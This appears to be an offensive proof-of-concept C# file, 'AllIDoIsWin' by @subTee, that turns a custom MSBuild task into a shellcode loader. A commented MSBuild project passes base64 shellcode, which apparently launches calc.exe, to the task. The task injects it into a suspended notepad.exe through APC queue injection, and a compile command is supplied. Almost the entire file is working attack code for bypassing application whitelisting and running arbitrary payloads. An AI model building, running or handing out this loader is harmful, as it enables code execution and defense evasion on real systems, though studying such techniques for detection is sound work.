AllIDoIsWin by @subTee

1. /*
2. <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3.             <Target Name="MyTarget">
4.                 <SimpleTask MyProperty="My voice is my passport."
5.                 MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
6.                 MyProcess="C:\Windows\notepad.exe"/>
7.             </Target>
8.         <UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />
9.     </Project>
10. */
11.  
12. using System;
13. using System.Diagnostics;
14. using System.Reflection;
15.  
16. using System.Runtime.InteropServices;
17.  
18. using Microsoft.Build.Framework;
19. using Microsoft.Build.Utilities;
20.  
21.  
22. // C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.Tasks.v4.0.dll";"Microsoft.Build.Utilities.v4.0.dll" /target:library C:\Users\mobile\AllIDoIsWinWinWin.cs
23.  
24. namespace MyTasks
25. {
26.     public class SimpleTask : Task
27.     {
28.         public override bool Execute()
29.         {
30.            
31.            
32.             Console.WriteLine(this.MyProcess);
33.             Console.WriteLine(this.MyProperty);
34.             ApcInjectionNewProcess.Exec(this.MyCode,this.MyProcess);
35.            
36.             return true;
37.         }
38.  
39.  
40.         public string MyProperty { get; set; }
41.         public string MyCode { get; set; }
42.         public string MyProcess { get; set; }
43.        
44.  
45.     }
46. }
47.  
48.  
49. public class ApcInjectionNewProcess
50. {
51.     public static void Exec(string a, string b)
52.     {  
53.         byte[] shellcode = System.Convert.FromBase64String(a);
54.        
55.        
56.        
57.         // Target process to inject into
58.         string processpath = b;//@"C:\Windows\notepad.exe";
59.         STARTUPINFO si = new STARTUPINFO();
60.         PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
61.        
62.         // Create new process in suspended state to inject into
63.         bool success = CreateProcess(processpath, null,
64.             IntPtr.Zero, IntPtr.Zero, false,
65.             ProcessCreationFlags.CREATE_SUSPENDED,
66.             IntPtr.Zero, null, ref si, out pi);
67.        
68.         // Allocate memory within process and write shellcode
69.         IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
70.         IntPtr bytesWritten = IntPtr.Zero;
71.         bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
72.        
73.         // Open thread
74.         IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
75.         uint oldProtect = 0;
76.        
77.         // Modify memory permissions on allocated shellcode
78.         resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
79.        
80.         // Assign address of shellcode to the target thread apc queue
81.         IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
82.        
83.         IntPtr ThreadHandle = pi.hThread;
84.         ResumeThread(ThreadHandle);
85.        
86.     }
87.    
88.    
89.     private static UInt32 MEM_COMMIT = 0x1000;
90.  
91.     private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR  ;-)
92.     private static UInt32 PAGE_READWRITE = 0x04;
93.     private static UInt32 PAGE_EXECUTE_READ = 0x20;
94.    
95.    
96.     [Flags]
97.     public enum ProcessAccessFlags : uint
98.     {
99.         All = 0x001F0FFF,
100.         Terminate = 0x00000001,
101.         CreateThread = 0x00000002,
102.         VirtualMemoryOperation = 0x00000008,
103.         VirtualMemoryRead = 0x00000010,
104.         VirtualMemoryWrite = 0x00000020,
105.         DuplicateHandle = 0x00000040,
106.         CreateProcess = 0x000000080,
107.         SetQuota = 0x00000100,
108.         SetInformation = 0x00000200,
109.         QueryInformation = 0x00000400,
110.         QueryLimitedInformation = 0x00001000,
111.         Synchronize = 0x00100000
112.     }
113.    
114.     [Flags]
115.     public enum ProcessCreationFlags : uint
116.     {
117.         ZERO_FLAG = 0x00000000,
118.         CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
119.         CREATE_DEFAULT_ERROR_MODE = 0x04000000,
120.         CREATE_NEW_CONSOLE = 0x00000010,
121.         CREATE_NEW_PROCESS_GROUP = 0x00000200,
122.         CREATE_NO_WINDOW = 0x08000000,
123.         CREATE_PROTECTED_PROCESS = 0x00040000,
124.         CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
125.         CREATE_SEPARATE_WOW_VDM = 0x00001000,
126.         CREATE_SHARED_WOW_VDM = 0x00001000,
127.         CREATE_SUSPENDED = 0x00000004,
128.         CREATE_UNICODE_ENVIRONMENT = 0x00000400,
129.         DEBUG_ONLY_THIS_PROCESS = 0x00000002,
130.         DEBUG_PROCESS = 0x00000001,
131.         DETACHED_PROCESS = 0x00000008,
132.         EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
133.         INHERIT_PARENT_AFFINITY = 0x00010000
134.     }
135.     public struct PROCESS_INFORMATION
136.     {
137.         public IntPtr hProcess;
138.         public IntPtr hThread;
139.         public uint dwProcessId;
140.         public uint dwThreadId;
141.     }
142.     public struct STARTUPINFO
143.     {
144.         public uint cb;
145.         public string lpReserved;
146.         public string lpDesktop;
147.         public string lpTitle;
148.         public uint dwX;
149.         public uint dwY;
150.         public uint dwXSize;
151.         public uint dwYSize;
152.         public uint dwXCountChars;
153.         public uint dwYCountChars;
154.         public uint dwFillAttribute;
155.         public uint dwFlags;
156.         public short wShowWindow;
157.         public short cbReserved2;
158.         public IntPtr lpReserved2;
159.         public IntPtr hStdInput;
160.         public IntPtr hStdOutput;
161.         public IntPtr hStdError;
162.     }
163.    
164.     [Flags]
165.     public enum    ThreadAccess : int
166.     {
167.         TERMINATE           = (0x0001)  ,
168.         SUSPEND_RESUME      = (0x0002)  ,
169.         GET_CONTEXT         = (0x0008)  ,
170.         SET_CONTEXT         = (0x0010)  ,
171.         SET_INFORMATION     = (0x0020)  ,
172.         QUERY_INFORMATION       = (0x0040)  ,
173.         SET_THREAD_TOKEN    = (0x0080)  ,
174.         IMPERSONATE         = (0x0100)  ,
175.         DIRECT_IMPERSONATION    = (0x0200)
176.     }
177.    
178.     [DllImport("kernel32.dll", SetLastError = true)]
179.     public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
180.         int dwThreadId);
181.    
182.     [DllImport("kernel32.dll",SetLastError = true)]
183.     public static extern bool WriteProcessMemory(
184.         IntPtr hProcess,
185.         IntPtr lpBaseAddress,
186.         byte[] lpBuffer,
187.         int nSize,
188.         out IntPtr lpNumberOfBytesWritten);
189.    
190.     [DllImport("kernel32.dll")]
191.     public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
192.    
193.     [DllImport("kernel32")]
194.     public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
195.          Int32 size, UInt32 flAllocationType, UInt32 flProtect);
196.     [DllImport("kernel32.dll", SetLastError = true )]
197.     public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
198.     Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
199.    
200.     [DllImport("kernel32.dll", SetLastError = true)]
201.     public static extern IntPtr OpenProcess(
202.      ProcessAccessFlags processAccess,
203.      bool bInheritHandle,
204.      int processId
205.     );
206.    
207.    
208.     [DllImport("kernel32.dll")]
209.     public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
210.     [DllImport("kernel32.dll")]
211.     public static extern uint ResumeThread(IntPtr hThread);
212.     [DllImport("kernel32.dll")]
213.     public static extern uint SuspendThread(IntPtr hThread);
214.     [DllImport("kernel32.dll")]
215.     public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
216.     int dwSize, uint flNewProtect, out uint lpflOldProtect);
217. }